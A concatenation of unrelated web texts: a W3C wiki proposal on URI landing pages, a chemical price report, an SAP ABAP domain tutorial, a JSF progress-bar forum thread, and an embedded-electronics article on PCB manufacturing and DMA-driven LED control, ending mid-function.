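        # the loop swaps one extra time once left has met or crossed right,
        # un-reversing the middle of the string.
        if left >= right:
            break
        chars[left], chars[right] = chars[right], chars[left]
        left += 1
        right -= 1
    return "".join(chars)

print(reverse_string("abcd"))  # dcba
```

With the test placed first, a four-character string swaps exactly twice, matching what the logpoints said the loop should do.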
https://cloud.google.com/debugger/docs/quickstart
HR14aCompromise

From W3C Wiki. See also TagIssue57Home.

This proposal (see TagIssue57Responses) is designed to make everyone equally happy and everyone equally unhappy. Work in progress - still working out the details. JAR's work on this proposal is suspended on the basis of an assessment that a prohibition on sameAs will be rejected out of hand by the "no longer implies" proposal signers.

Synopsis

There is a weakly specified relationship between what a URI refers to and the generic resource at that URI. This lets URIs be used in different ways in different situations. The weak constraint on the relationship is strong enough to get predictable behavior when one wants to be clear, by talking about the "landing page", while leaving the URI itself free for other uses. When one is not clear, human judgment may be required to interpret the URI. This is really an approach to creating proposals for interoperable use of hashless http: URIs, not a proposal in itself. It provides constraints without particular guidance. See the bottom of the page for thoughts on how to develop.

Generic resources

Assume anything like TimBL's or JAR's or Pat's theory of what is accessed using a URI. If accepting this premise holds you up, please let me know and I can tighten it up (at least in the RDF case). To avoid the AWWW baggage I'm not calling them "information resources", but it may end up that that's a better term. Maybe "time-varying information" or "variable information".

For each retrieval-enabled hashless http: URI (REHU), assume there is a generic resource, written functionally at the meta-level GR(U) where U is a REHU, whose representations/instances/encodings are the representations retrieved using that URI. I believe this is a safe assumption. There is no assumption that GR(U) is identified either by U or by any other URI.
The resource to landing page map

We introduce a new URI w:landingPage whose meaning is mostly uninterpreted (left up to human judgment) except for the following.

Call an RDF interpretation (see RDF Semantics) "conforming" (to this proposal) if it satisfies the following constraints:

- For each REHU U that is interpreted, w:landingPage relates the interpretation of U to GR(U) (which can probably be made rigorous, let me know if this catches you up)
- w:landingPage as a property is functional, i.e. every resource identified in this way has a unique associated landing page (possibly but not necessarily itself).

If you know what the URI refers to you can recover GR(U). The interpretation can be further constrained by statements in the graph as per the usual RDF (or OWL) semantics. To the extent it is unconstrained, human judgment may be required for correct interpretation.

If w:landingPage were not functional, there would be no way to relate resources to particular landing pages. E.g. if Chicago had two landing pages you would have to use a string-valued property like contentUri to refer to the landing pages; you could not relate a particular landing page unambiguously to Chicago.

We may want an additional constraint on interpretations that RDF URI references that are provably equivalent according to the HTTP and URI specs must be interpreted the same, but this is a detail.

Proposal 25 suggests a Document: link header expressing the same relationship. The Content-Location: header has also been suggested as a way to express this, but JAR opposes this, since if GET U yields Content-Location: Q then GR(Q) is not necessarily equal to GR(U), and what we need is a way to refer to GR(U), not GR(Q).

Although this is very similar to 'describedby' in the 'no longer implies' proposal, 'describedby' has the wrong name and semantics for the relation, since not every landing page would describe anything at all, much less specifically what its URI would be known to refer to.
It's hard to imagine what the landing page of a non-describing GR would be, other than itself. This situation is very different from 303, where one can generally assume you get a useable description.

The choice of URI is up for grabs. w:landingPage is just a placeholder and the namespace w: is TBD. It is inappropriate in that in common use the landing page for X is usually distinct from X, whereas here a GR can be its own landing page. Other names I considered: genericResource, doppelganger.

HTTP consistency

The HTTP protocol talks about the representations of the identified resource. These are the 200 responses to GET requests. The idea of this proposal is that the representations of the landing page are the same as the representations of the identified resource, even when they are different resources. The identified resource has no representations that are not representations of the landing page. It is through this gimmick that consistent identity with HTTP is maintained.

If w:landingPage were not functional, the identified resource could have representations coming from one URI that were not representations coming from a different URI, and trying to reflect identities back down from the RDF level to the HTTP level would result in incorrect answers to the question "is Z a representation of the identified resource".

HTTP sometimes talks about other properties of the identified resource, such as where it is located. These properties also have to be consistent if a URI is to identify "uniformly", i.e. to have the same identities and nonidentities at both the HTTP level and the RDF level. See the HTTP consistency use case.

Discovery

This relates to the question "the landing page may describe zero, one, or many things, so which of the many things described, or other things that happen to be at hand such as the landing page itself, is meant?".
This is already underspecified by the proposal, and the point is to make the mapping a matter of interpretation influenced by representation provider choice and evolving community ideas. But it is desirable to posit a consistent mapping from landing page to thing so that there is a feeling that some rule is being followed permitting discovery of identity from retrieved content (the discovery principle).

Unfortunately, under most proposals the same generic resource might have to serve as the landing page for two or more resources, depending on, say, which URI it came from. That is, to implement distinct URIs for the various things described (e.g. the statement '<U> describedby <V>.' describes both <U> and <V>), set up several URIs as HTTP-level aliases for the same GR, and distinguish their referents based on what that GR says differentially using the various URIs. It may be necessary to say that the URI is the only other thing the "identification" mapping is supposed to depend on. But expressing this as a constraint on RDF interpretations doesn't work, since by the time we talk about the property, the URIs have been lost and all we have is domain elements. We would have to preserve the URI itself as a property of the landing page (removing the possibility of aliases between resources), which would be very ugly. We will consider this disambiguation to be in general a lost cause, but see below.

The following may be the tightest constraint we can get away with:

- For an interpretation to be conforming, whenever x and y are related by the w:landingPage property, either x=y or x is related to y via wdrs:describedBy.

with the observation that nothing requires wdrs:describedBy to be functional.

Reference to content use case

This is the case where you're writing a message or document and you want to refer to GR(U) for some REHU U.
Alternatives:

- Use the URI and hope that whoever's interpreting your graph also assumes <U> w:landingPage <U>
  - This will be fairly obvious if the representations at U contain this statement
  - It should also be clear (to human judgment) if the representations don't seem to describe anything in particular
  - It should be clear if the representations are evidently self-describing
  - It should be clear if the representations are equivalent to serializations of RDF graphs and the graphs don't contain <U>
  - A Link: header could provide this information
- Use the URI and explicitly say <U> w:landingPage <U> in the same message or document, then hope that others will not use the URI differently
  - This is a good bet if you're the one controlling representations at the URI and can insert a declaration
  - Pretty good bet if there is no other reasonable interpretation (see below)
- Use a local hash URI or tag: URI and define it, e.g. <#doc> where <#doc> w:landingPage <U>
- Use blank node notation similarly [w:landingPage <U>]

Reference to something described use case

This is the case where you want to refer to something described by the representations retrieved from U. If the representation might describe any of several different things this gets a bit dodgy, but let's assume what's described is clear. There are two common modes of description: either the representations use the URI to refer to something (i.e. they describe <U> by incorporating statements whose subject is written <U>), or there is some obvious primary topic.
- Use the URI and hope the intent will be clear
  - It will be clear if representations contain an explicit declaration such as the below
  - It will be fairly obvious if representations contain lots of statements whose subject is <U>
  - Maybe it will be clear in cases like Amazon page URIs referring to books (depending on who you talk to)
  - The representation provider could help make it clear using a Link: header per below
- Use the URI and explicitly say <U> wdrs:describedby [w:landingPage <U>] (with local hash URI or tag: URI as alternatives to blank node), or similar with foaf:primaryTopic (but be careful if multiple things seem to be described, or if primary topic could be more than one thing)
  - If that's annoyingly long let's define a new property that's the composition of the two (this property could be used in Link: too)
- Use the URI and explicitly say <U> wdrs:describedby <V> where V is covered by these considerations
- Use the URI and explicitly say <U> wdrs:describedby <V> where <V> w:landingPage <V> seems likely based on its being on the right-hand side of a wdrs:describedby statement

It would be nice if <V> w:landingPage <V> were a consequence of <U> wdrs:describedby <V> as in the "no longer implies" change proposal, but I'm afraid it doesn't logically follow, it's only highly likely. We could try to retroactively shoehorn this into the semantics of wdrs:describedby, or (better) we could define a new property that entails it.

Reference to self-describing content

- Use the URI and hope it will be clear (since you will probably get the right answer under either of the two plausible interpretations, although it gets dodgy with, say, Moby Dick)
- Use the URI and explicitly say either, or ideally both, of <U> wdrs:describedby <U> and <U> w:landingPage <U>.

Consequences for linked data

<U> rdf:type :Earthquake now becomes plausible even when U is a REHU.
To implement a functional w:landingPage one must be prepared to map from resources (however they are modeled) back to a unique landing page. This is usually pragmatically easy, since you know the URI (you are using it to refer to the resource) and you can recover GR(U) from the URI. But if a resource is named by two REHUs, it will not be possible to decide which landing page to pick, since the URI has been lost by that point.

Since the relation is functional, it becomes incorrect to say (or imply) <U> owl:sameAs <V> if U and V are both REHUs and GR(U) not= GR(V). This requirement would be met by a UNA (unique name assumption) but is slightly weaker. If e.g. <U> rdf:type :Earthquake and <V> rdf:type :Earthquake and <U> owl:sameAs <V>, then either the content has to be equivalent, or members of class :Earthquake need to be interpreted not exactly as earthquakes but as "views" or "profiles" on earthquakes, or earthquakes "according to" some authority. People engage in this kind of substitution (metonymy) all the time without getting confused, and in the case where machine inference is desired it is possible as an option to be clear and avoid such confusions.

One way to get aliasing (sameAs) might be to use a 302 or 307 redirect. This limitation on owl:sameAs is the price you are asked to accept, in exchange for the benefit of being able to use 200 instead of 303. Of course if you wanted to you could still write owl:sameAs where it is incorrect in order to achieve some end; but it would be wrong, i.e. nonconforming. Maybe this is OK, since most uses of owl:sameAs in RDF are already nonconforming to the OWL spec.

Comparison with "no longer implies"

NLI doesn't require describedby to be functional, i.e. it allows multiple landing pages for the same thing. So a blank node that's a describedby target can't be used to designate a particular landing page. NLI just says that the target of a describedby is an information resource.
The implication is that you can use the IR's URI to refer to the IR, but this conclusion, while sort of reasonable, doesn't logically follow (and seems to be contradicted by the existence of IRs that are not their own landing pages, such as the Flickr example, or Crossref DOIs as they used to be served, with 302).

The present proposal improves on NLI:

- by allowing determination of a particular landing page for a URI (as opposed to an ambiguous reference)
- by giving a way to reliably refer to documents that don't describe anything (which obviously can't be done using describedby).

[w:landingPage <U>] is similar to [w:contentUri "U"] from some of the other proposals.

Possible mitigation

We could standardize a new equivalence relation (property) that is similar to owl:sameAs but considers equivalent things that are the same other than that they're described on different web pages. Then those currently using owl:sameAs could just switch to the new property, inference engines could be retooled to effectively alias the two (which ought to be easy), and we're done. In fact many uses of sameAs are logically incorrect, and switching from sameAs to a new predicate could help protect data from more aggressive inference engines.

How to turn this into a useful agreement

Some URIs could identify compatibly with HR14a, via either an opt-in or an opt-out scheme. This would be the case if a resource is its own landing page: <U> w:landingPage <U>. Otherwise, there are (at least) three general tacks one could take.

A single URI is associated with up to three resources: a landing page, what the landing page is about (call that X), and what the URI identifies (<U>). What's needed is a consistent interpretation, in tandem, of <U> and the property being used to assert something about the interpretation of the URI, e.g. <U> :bestFriend [foaf:name "Patrick Winston"]. First note that any interpretation has to assign a unique landing page to <U>.
That is, <U> cannot have two different landing pages. The representations (sensu HTTP specification) of <U> are the representations (sensu "information resource" encoding) of the landing page. Given that, here are some possibilities (probably not an exhaustive list):

- <U> is the document, and :bestFriend is interpreted as relating <U> to Patrick Winston by composing <U>'s relation to X with X's relation to Patrick Winston. (This would actually be HR14a in disguise.)
- <U> is X, and :bestFriend relates X to Patrick Winston.
- <U> is a "chimera", i.e. a synthetic entity that has some properties of the landing page and some properties, e.g. :bestFriend, of X.

Any of these interpretations would be consistent with this proposal. A particular realization of the proposal might or might not care to encourage one of the three interpretations over the others, e.g. by standardizing on the use of some ontology or set of annotations whose documentation would favor one of the interpretations.

See also

- Handy diagram
- HTTPURIUseCaseMatrix
- When owl:sameAs isn't the Same Redux: A preliminary theory of identity and inference on the Semantic Web, by Halpin, Hayes, and Thompson. In Proceedings of the Workshop on Discovering Meaning on the Go in Large Heterogeneous Data 2011 (LHD-11)
http://www.w3.org/wiki/HR14aCompromise
03 August 2010 23:59 [Source: ICIS news]

LONDON (ICIS)--Third-quarter contract prices in the European polybutylene terephthalate (PBT) market were up by €0.05-0.10/kg on the low end, due to an increase in feedstock butanediol (BDO) prices and continued healthy demand, sources said on Tuesday.

Prices were assessed this week between €2.45-3.45/kg ($3.22-4.54/kg) FD (free delivered) NWE (northwest Europe).

Filled grade PBT was assessed at €2.45-2.65/kg, an increase of €0.10/kg from previous levels. Prices for unfilled grade were pegged at €2.50/kg, up €0.05/kg from second-quarter values. Flame retardant contract prices for the third quarter were up €0.10/kg at €3.10/kg but unmoved on the high end.

The increase in values had been expected by both buyers and sellers, given the current inflated costs of feedstock BDO and the healthy demand from the automotive industry, which is the key downstream market for PBT. Sources spoke of continued firm demand which has, despite the summer months, remained solid.

"Demand is quite strong and I, personally, don't expect us to have a slowdown this year," a trader said.

($1 = €0.76)
http://www.icis.com/Articles/2010/08/03/9381868/europe-third-quarter-pbt-rolls-up-0.05-0.10kg.html
SAP ABAP - Domains

The three basic objects for defining data in the ABAP Dictionary are domains, data elements and tables. A domain can be used by several data elements (for example, MATNN and MATNR_D), and these data elements are in turn assigned to many table fields and structure fields.

Creating Domains

Before you create a new domain, check whether any existing domains have the same technical specifications required in your table field. If so, use that existing domain. Let's discuss the procedure for creating a domain.

Step 1 − Go to Transaction SE11.

Step 2 − Select the radio button for Domain in the initial screen of the ABAP Dictionary, and enter the name of the domain as shown in the following screenshot. Click the CREATE button. You may create domains under the customer namespaces, and the name of the object always starts with 'Z' or 'Y'.

Step 3 − Enter the description in the short text field of the maintenance screen of the domain. In this case, it is "Customer Domain".

Note − You cannot enter any other attribute until you have entered this attribute.

Step 4 − Enter the Data Type, No. of Characters, and Decimal Places in the Format block of the Definition tab.

Step 5 −.

Step 6 − Activate your domain. Click the Activate icon (matchstick icon) or press CTRL + F3 to activate the domain. A pop-up window appears, listing the 2 currently inactive objects as shown in the following snapshot −

Step 8 − At this point, the top entry labeled 'DOMA' with the name ZSEP_18 is to be activated. As this is highlighted, click the green tick button. This window disappears and the status bar will display the message 'Object activated'.

If error messages or warnings occurred when you activated the domain, the activation log is displayed automatically. The activation log displays information about activation flow. You can also call the activation log with Utilities(M) → Activation log.
https://www.tutorialspoint.com/sap_abap/sap_abap_domains.htm
JSF forum: richfaces Process Bar (progress bar)

Suresh Khant (Ranch Hand), posted Mar 17, 2010 03:18:04

Hi All,

I am trying to implement the progress (process) bar example, which I need for my interface. I have just copied the example from the RichFaces site. What I want is that once the user clicks the button, it should call a method which will take some time to finish processing; while the processing is going on, I just want to display a message indicating that there is some process going on. In the code below, once I click the button it calls the method processSomething from the method startProcess, and only after finishing the processing in that method does it show the progress bar, which is not what I want: it should show the progress bar while the processing is going on in processSomething. Can anyone help me fix this issue? Here is the code:

    <ui:define
    <h:form>
    <a4j:outputPanel
    <rich:progressBar
    <f:facet
    <br />
    <h:outputText
    <a4j:commandButton
    </f:facet>
    <f:facet
    <br />
    <h:outputText
    <a4j:commandButton
    </f:facet>
    </rich:progressBar>
    </a4j:outputPanel>

    package com.lit.message.backoffice.web.bean;

    import java.util.Date;

    /**
     * @author techbrainless
     */
    public class ProgressBarBean {

        private boolean buttonRendered = true;
        private boolean enabled = false;
        private Long startTime;

        public String startProcess() {
            setEnabled(true);
            setButtonRendered(false);
            setStartTime(new Date().getTime());
            processSomething();
            return null;
        }

        public Long getCurrentValue() {
            if (isEnabled()) {
                Long current = (new Date().getTime() - startTime) / 1000;
                if (current > 100) {
                    setButtonRendered(true);
                } else if (current.equals(0)) {
                    return new Long(1);
                }
                return (new Date().getTime() - startTime) / 1000;
            }
            if (startTime == null) {
                return Long.valueOf(-1);
            } else {
                return Long.valueOf(101);
            }
        }

        public boolean isEnabled() { return enabled; }
        public void setEnabled(boolean enabled) { this.enabled = enabled; }
        public Long getStartTime() { return startTime; }
        public void setStartTime(Long startTime) { this.startTime = startTime; }
        public boolean isButtonRendered() { return buttonRendered; }
        public void setButtonRendered(boolean buttonRendered) { this.buttonRendered = buttonRendered; }

        public void processSomething() {
            // process something ... which requires some time
        }
    }

Tim Holloway (Saloon Keeper), posted Mar 17, 2010 06:23:08

That's not going to work. An HTTP request doesn't return anything at all until all the code in the request handler has completely finished processing. So you'd get a long delay and then 100%. To get a progress display, you're going to need to run the long-running work in a separate thread, start the thread in your backing bean, then return to the caller, leaving the thread to run. You also need to make sure that the thread you start isn't tied to a transient object like a servlet request, or you'll run out of HTTP request processors. Traditionally, I've simply set up what I call a "null servlet" whose init() method launched a thread engine which could be petitioned to run the threads on its own resource structure.
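A minimal sketch of Tim's advice follows; the names and structure are illustrative, not a drop-in RichFaces bean, and a shared java.util.concurrent executor plays the role of his "thread engine". The request handler only submits the job and returns at once, while the worker updates a thread-safe progress counter that getCurrentValue() can poll on subsequent AJAX requests.

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.atomic.AtomicInteger;

public class ProgressTask {
    // Shared pool, created once for the application;
    // not tied to any transient servlet request.
    public static final ExecutorService POOL = Executors.newFixedThreadPool(2);

    private final AtomicInteger percent = new AtomicInteger(0);

    // Submits the long-running work and returns immediately,
    // so the HTTP response is not blocked.
    public Future<?> startProcess(int steps) {
        return POOL.submit(() -> {
            for (int i = 1; i <= steps; i++) {
                // ... one slice of the real work goes here ...
                percent.set(i * 100 / steps);
            }
        });
    }

    // Polled by the progress bar on each AJAX request.
    public int getCurrentValue() {
        return percent.get();
    }
}
```

In the JSF page, the progress bar's value would then be bound to getCurrentValue(), and the rendered flags toggled once the returned Future completes.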
http://www.coderanch.com/t/487581/JSF/java/richfaces-Process-Bar-progress-bar
Nov 08 2017, 9:04 PM

In the last section, you learned all about how to create the design files that will bring your project from just a figment of your imagination all the way to a working prototype and then into a design that is ready to be manufactured. In this section, I will give you an overview of the process to take those design files to market.

Step 6: Manufacturing Prototypes to Production

If you have made it this far, you have a design file that represents the PCB artwork to be laid out in copper. This is where a real board is finally created from all of your careful planning and months of researching, breadboarding, and designing. You have many options to turn that artwork into a real, physical board and then assemble that board with real components.

Manufacturing Terminology

Manufacturing Options By Phase

The first PCBs that you bring up will not be perfect. You will not go straight to production. Despite all of your hard work in schematic and layout, you will fail to connect everything perfectly. It is highly recommended to build just a few boards in the first batch and then bring up just those few to ensure that the artwork is correct before ordering thousands upon thousands more. Then, a pilot build will help hone your process for the onslaught of thousands or even millions of boards. Do you want to find out that your process is broken after you have developed 100 boards or one million boards?

Manufacturing Phase: Prototyping
  PCB Manufacture Options: DIY laser printer & etching; circuit printers; quick-turn board shop
  Assembly Options: DIY toaster oven and hand-soldering; prototype assembler

Manufacturing Phase: Pilot / Volume
  PCB Manufacture Options: domestic vs. foreign board shops
  Assembly Options: domestic vs. foreign assemblers; self-purchase parts, distributor, or assembler purchase

Prototyping Manufacturing Phase – DIY Options

The very first time you build a PCB for a new design, the quickest and cheapest way to get it done in very low volumes is to simply do the work yourself. There is some upfront investment in tools that has to be made, but you can continue to use those tools for future projects. There is also a real risk that you will do things improperly and create your own headaches. It depends on how willing you are to learn a new skill and take a risk that you could end up wasting your time and effort.

Old-School Board Etching

In order to build the PCB yourself, you have some options. The old-school way to build your own board was to purchase copper-clad circuit board blanks, lay plastic traces on the board, and then etch away the exposed copper using a powerful and toxic etching solution. This method is fine as long as you have large pin pitch components. It won't work for today's modern 1/2 mm pitch components.

[Figure: Hand-drawn circuits with marker and etching kit]

Laser Printer Board Etching

To reach a finer degree of precision, a laser printer can be used to print the Gerber artwork from a CAD program on special transfer paper, available from PulsarFX as a PCB Fab-in-a-Box kit. A laser printer's toner is essentially powdered plastic that is fused to the paper. By fusing the toner to transfer paper, the idea is that you can reheat the toner and it will release from the transfer paper onto your blank copper circuit board, which is part of the kit. You will need a high-temperature laminator, and it can be tricky to find one that works just right.

In my experience with this method, it was a little spotty. Thankfully, you can trace over any incomplete traces with an ordinary marker pen, and that will help resist the etching compound from removing the copper at the gaps in the traces. However, you lose some of the precision that was gained by the laser printer process.
In order to create a multilayer board, you must print out each layer and etch it separately, and then glue the layers together. Then, you have to drill through any of your through-holes or vias and make a connection between the layers with solder. With enough practice and experimentation, this method can be successful.

[Figure: Laser printed etch resist and final product with SMT LEDs]

Direct Circuit Printer

A recent invention in circuit board prototyping is the circuit printer. There are many exciting developments in this area that will surely produce useful tools for your prototyping work in the near future. Some notables to check out are Cartesian Co's Argentum and the soon-to-be-produced 3D circuit printer from Voltera. The big concern that I have for these devices in the near term is with fine pitch devices.

[Figure: Argentum and Voltera circuit printers]

Quick-turn PCB Services

The best choice for many makers, even with these available DIY choices, is to simply order a quick-turn board from a board shop. They can be found with very reasonable prices and ship the boards in a few days. You can still assemble the board yourself, which is where you will get more value.

Ordering Parts

However you acquire your PCB, the next step in the DIY process is to assemble the board. Before you can do that, you have to source the parts. This is a time-consuming activity. It is nice if you can find all of your parts from a single vendor, but often you will have to order from several and coordinate shipping so that you aren't waiting on a single part to start your build. You can't start meaningful assembly until all of the parts arrive.

When ordering parts, be prepared to make decisions that you never had any idea that you would need to make. You may know the exact major electronic components you will be ordering, but there is a collection of supporting components that needs to surround those major components.
You will find that there are many more types of resistors, capacitors, crystals and other miscellaneous parts that have a million variants. You have to specify things like brand, package, size, value, tolerance, material, lead or no-lead, temperature, wattage, operating voltage, etc., when all you want is a 1µF capacitor!

Your parts arrive packaged in little antistatic baggies or boxes. Now you have to match up each one of those components to a refdes on the schematics and formulate a plan. I line all my baggies up in a shoe box in the order that I will apply them to the board and prepare notes for myself so that when the assembly starts, I don't forget what I am doing.

If you are planning to have your boards assembled by an outside company, you can save money by ordering the parts yourself. Assemblers will charge a markup on any of the parts they order on your behalf. Just be sure to ask your assembler what kinds of machines they will use so that you get the right kind of packaging. An automated "tape and reel" machine requires that your parts are delivered in that fashion. If you don't order a full reel of parts, can your assembler accept "cut tape" parts that have been cut off of a reel?

[Figure: Parts ready for assembly]

SMT Board Assembly

You can assemble your SMT board yourself with the help of a toaster oven and solderpaste. If you had your PCB developed by a board shop, you have the option to order a stencil for the solderpaste. They are laser cut, and you can use this to spread solderpaste across the board, laying it down only on the areas where a component pin will land on a pad. You can get by without a stencil, but there is a higher chance of solder bridges, which are bits of solder that connect adjacent pads.

Solderpaste needs to be kept refrigerated, and you only have an hour or so before the solderpaste becomes a liquid, although it depends on the temperature of the room. I have extended it to a few hours with no issues.
The hardest part of placing components by hand is to get them to land on the solderpaste cleanly, and then not bumping them when you are placing nearby components.

[Figure: Solderpaste on a board, and then the parts placed and baked]

Oven Baking

Commercial SMT ovens bake the boards using a precise temperature profile to ensure that all of the solder melts and you don't cook your components too long. You can purchase a home SMT oven for a few hundred dollars, which includes the temperature profile. It's all automatic, which is great. I have only used a regular toaster oven from a household store. The directions that I found online were to simply insert the board in the oven, crank the temperature to 400 degrees, then watch for the solder to melt. The grey solderpaste becomes shiny silver when it melts. You can watch this process happen through the window of the toaster oven, as the temperature washes over the board, in my case from the corners inward. Once all of the solder turns silver, you wait about 15 seconds more and then remove the board from the oven.

There is risk with this method of some cold solder joints, and you will have to touch up any solder bridges you find with flux and a fine-tipped soldering iron. Use a 10x microscope if you can find one, and look for issues. Take your time. It is better to find the problem now than when you are powering up your board or debugging a software issue. Use a multimeter to check for shorts between power and ground and between traces that are hidden. I have been able to get several good boards out of this process in the first and only time that I tried it. Your mileage may vary.

Prototype/Pilot Manufacturing Phase – Outsource Vendor Option

The low-volume board development process is neither cheap nor fast. If you want it fast, prepare to spend a lot more. Quick-turn PCB builds can be done for a premium in 24 hours, if you are on a tight schedule.
Things get a lot more affordable as you approach a 5-day turn, and become most affordable at a 2-week turn. You will have to quote the boards in many different volumes, because you may be surprised to find that building 100 boards isn't ten times as expensive as building 10 boards. It can be just twice as expensive, for example, and may be worth it to get as many prototype boards as you need for your testing purposes.

When you receive your prototype boards, the first thing to do is a visual examination to look for copper traces that may be touching where they are not supposed to be touching. You will need to refer to the Gerber files and layout to compare the real PCB to the design files. Measure a few points with a micrometer. Once the board passes visual checks, you can probe the board with a Volt Ohm Meter (VOM) and ensure that there is no short circuit between the power and ground pins of any device. This is heartbreaking if you find it, because it can be hard to trace back where the error occurs. All vias pass through any internal power and ground planes, and if there was not sufficient anti-pad clearance inside those layers around all vias, you could get a power and ground short. You will need to then check every signal versus power/ground to find the offending signal. If you pass that check, you can then measure to ensure that all signal traces don't short against power or ground. If you find that all of the boards check out, move on to the assembly step.

The assembly of your electronic components onto a low volume of prototype boards can be very expensive if completed by a prototype assembler vendor. Be prepared for some pricey quotes! To make matters worse, the prototype assemblers are not in control of the schedule. They have large repeat customers that will knock your product to the back burner no matter what they may have quoted you regarding turn times. A fast turn time for the assemblers is five days.
It takes time for the assembler to examine the BOM, order the parts, receive the parts, configure the tape-and-reel machines (if used for your volume order), find pin #1 on all devices in your silkscreen and layout files, and then do hand-soldering touch-ups after your boards have been run through the automated assembly process. You may not have a test procedure for the prototype builds, but it would be helpful to define manufacturing tests by the time the pilot builds occur. The pilot builds are meant to test your process against a larger volume of manufacturing that will follow.

Volume Production Manufacturing Phase

When moving from pilot builds to manufacturing builds, your biggest concern will be cost. You certainly don't want to pay the pilot build prices or you will go broke. You must choose between domestic and foreign assemblers and board shops, keeping in mind the tradeoffs between cost, language barriers, shipping charges, and travel abroad to fix issues. Some assembly shops have domestic pilot lines with foreign volume lines, and those can be a good choice because their teams already work together. This phase is more about business strategy than engineering, and approaches will vary greatly between developers.

That's the big picture overview of what lies ahead if you plan to bring your own gadget to market.

In the last section, we built a software driver for the TI TLC5940 LED driver and used it to illuminate some test LEDs. We also figured out how to debug the driver with the help of the Simplicity Studio tools. In this section, we will create some data structures to make it easier to work with named colors, and then improve that driver to make use of the DMADRV library. This library allows us to more easily develop code that invokes the DMA peripheral.

Setting Specific Colors

We can develop some helper functions to turn on individual colors per LED driver channel and a color mixer to create standard blended colors such as purple.
typedef struct color_code_bits
{
	uint8_t red;
	uint8_t green;
	uint8_t blue;
} color_code_struct;

#define WHITE	{ 0xFF, 0xFF, 0xFF }
#define RED	{ 0xFF, 0x00, 0x00 }
#define GREEN	{ 0x00, 0xFF, 0x00 }
#define BLUE	{ 0x00, 0x00, 0xFF }
#define PURPLE	{ 0xFF, 0x00, 0xFF }
#define YELLOW	{ 0xFF, 0xFF, 0x00 }
#define ORANGE	{ 0xFF, 0x0F, 0x00 }

// Sets the color in memory but does not write it
void set_color_buffer(uint8_t led_number, color_code_struct color)
{
	const uint8_t ch0 = led_number * 3;
	const uint8_t ch1 = ch0 + 1;
	const uint8_t ch2 = ch1 + 1;

	// Shift the 8-bit RGB code over by 4 to get to 12 bits of GS
	stream.channel[ch0].grayscale = (uint16_t) (color.red << 4);
	stream.channel[ch1].grayscale = (uint16_t) (color.green << 4);
	stream.channel[ch2].grayscale = (uint16_t) (color.blue << 4);
}

These functions can then be used to set whatever color codes we want per channel, like purple/yellow/purple:

	const color_code_struct purple = PURPLE;
	set_color_buffer(0, purple);

	const color_code_struct yellow = YELLOW;
	set_color_buffer(1, yellow);

	set_color_buffer(2, purple);

	// Now send the stream to the TLC5940
	stream.mode = GRAYSCALE_MODE;

	// Now write the GS data
	write_serial_stream();

This resulted in a nice purple color on the first and third LED, but the yellow LED had a bit of a greenish tint. Likewise, setting all colors to 0xFF resulted in a blue-ish white. It seems necessary to compensate for the relative brightness of each color LED in the RGB set to get the blended colors just right.

Introduction to Direct Memory Access (DMA)

We used DMA in the last chapter with the help of the SPIDRV library, but we didn't have to program anything in the DMA engine ourselves. We could use SPIDRV again here, but instead we will learn another way to set up DMA ourselves so that we gain a deeper understanding of how it works.
The DMA peripheral is a highly-configurable tool that moves data from one place to another, and it does so without help from the MCU once the transfer is started. This allows the MCU to sleep or do other things. There are multiple channels available to perform multiple transfers between different sources and destinations. The DMA transfer can be triggered through many sources and generates an interrupt when it is done moving the data. It is a simple mechanism, but it is sometimes difficult to understand and can be harder to debug than sequential programming. The toughest part is understanding how to set it up.

Fortunately, Silicon Labs has provided a DMA driver called DMADRV. To use this driver, all you need to do is include the dmadrv.h file at the top of your source code as well as copy the required files from the Simplicity Studio emdrv directory. See the example in Github here for the required files that I have copied into the project src directory. The DMA peripheral can also be set up through use of the em_drv library. There are examples in Application Note AN0013 Direct Memory Access that configure things more manually.

In short, the DMA peripheral looks for something called a descriptor table located in RAM that holds the configuration of the data transfer. This configures the DMA behavior, along with the configuration registers that reside inside the DMA peripheral. All of these things need to be configured, and then the DMA peripheral can do the transfer once its trigger event occurs. The descriptor table is used by the DMA peripheral at the trigger event to determine how to complete the transfer, including end addresses, address increment size, number of transfers, etc. When the transfer is complete, the DMA peripheral can be configured to issue an interrupt.

There are four modes of operation of the DMA peripheral. DMADRV only simplifies the use of the Basic DMA mode, but does not do too much to help with the other advanced modes.
That is good for this example, since we only need Basic DMA mode for transferring data from our array in RAM to the USART peripheral. To use the DMADRV, all we need to do is put a bit of code in the beginning of our main program to initialize the DMADRV and let it find an open DMA channel for us. This is great, because we don't have to worry about using the same channel that SPIDRV or some other module is already using.

// These variables are global, at the top of the file
unsigned int dma_channel;

// Transfer Flag
volatile bool dma_in_progress;

	// The following code is in the main function
	Ecode_t result;

	// Initialize DMA.
	result = DMADRV_Init();
	if (result != ECODE_EMDRV_DMADRV_OK)
	{
		DEBUG_BREAK
	}

	// Request a DMA channel.
	result = DMADRV_AllocateChannel(&dma_channel, NULL);
	if (result != ECODE_EMDRV_DMADRV_OK)
	{
		DEBUG_BREAK
	}

Now, we have a DMA channel that we can pass into the DMADRV functions. To make the transfer, we can replace the for loop that we used inside of the write_serial_stream function with the DMADRV_MemoryPeripheral function. First, we define the callback function that is called when the DMA transfer is complete:

void dma_transfer_complete(unsigned int channel, bool primary, void *user)
{
	// Clear flag to indicate that transfer is complete
	dma_in_progress = false;
}

Next, we have to change a few things inside of the write_serial_stream function to handle the DMA transfer. If you recall from the previous section, we incremented through the serial_stream array backwards in order to send the most significant byte first on the USART, as the TLC5940 expects to see the data.

	// Now write the stream, MSByte first
	for (int i = length - 1; i >= 0; i--)
	{
		USART_Tx(USART1, stream_buffer[i]);
	}

But we can't do that with DMA, as it can only iterate through memory in the forward direction.
So we have to fill the serial_stream array backwards instead, and then the direction in which the DMA peripheral fetches the data from memory and pushes it to the USART will be in the correct order.

// This must be global to be used for DMA
uint8_t stream_buffer[MAX_STREAM_BIT_LEN/8];

void write_serial_stream()
{
	int length;

	// Must pack the bits in backwards for DMA driver
	if (stream.mode == DOT_CORRECTION_MODE)
	{
		length = DC_STREAM_BIT_LEN / 8;
		for (int i=0; i < length; i++)
		{
			stream_buffer[length-i-1] = pack_dc_byte(i);
		}
	}
	else
	{
		length = MAX_STREAM_BIT_LEN / 8;
		for (int i=0; i < length; i++)
		{
			stream_buffer[length-i-1] = pack_gs_byte(i);
		}
	}

	// Set/clear the VPRG pin
	if (stream.mode == DOT_CORRECTION_MODE)
	{
		GPIO_PinOutSet(CONTROL_PORT, VPRG_PIN);
	}
	else
	{
